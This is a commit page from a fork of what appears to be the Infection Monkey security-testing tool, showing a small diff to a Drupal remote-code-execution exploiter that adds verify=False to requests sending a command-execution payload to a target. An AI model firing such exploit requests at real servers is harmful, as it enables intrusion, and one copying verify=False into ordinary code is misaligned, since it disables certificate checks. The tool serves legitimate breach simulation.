p41275903
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

verify=False for HTTPS requests

This commit is contained in:
ophirharpazg 2020-09-02 00:17:46 +03:00
parent eb4f50a0ca
commit 702f5c1a41
1 changed files with 7 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
monkey/infection_monkey/exploit/drupal.py
View File

@ -75,7 +75,8 @@ class DrupalExploiter(WebRCE):
response = requests.get(f'{url}?_format=hal_json', response = requests.get(f'{url}?_format=hal_json',
json=payload, json=payload,
headers={"Content-Type": "application/hal+json"}) headers={"Content-Type": "application/hal+json"},
verify=False)
if is_response_cached(response): if is_response_cached(response):
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring') LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
@ -89,8 +90,11 @@ class DrupalExploiter(WebRCE):
base = remove_port(url) base = remove_port(url)
payload = build_cmd_execution_payload(base, cmd) payload = build_cmd_execution_payload(base, cmd)
r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"}) r = requests.get(f'{url}?_format=hal_json',
json=payload,
headers={"Content-Type": "application/hal+json"},
verify=False)
if is_response_cached(r): if is_response_cached(r):
LOG.info(f'Exploiting {url} returned cache HIT, may have failed') LOG.info(f'Exploiting {url} returned cache HIT, may have failed')